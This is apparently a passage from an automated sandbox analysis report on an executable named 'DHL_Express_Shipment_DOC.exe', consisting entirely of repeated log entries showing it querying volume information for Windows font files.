                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
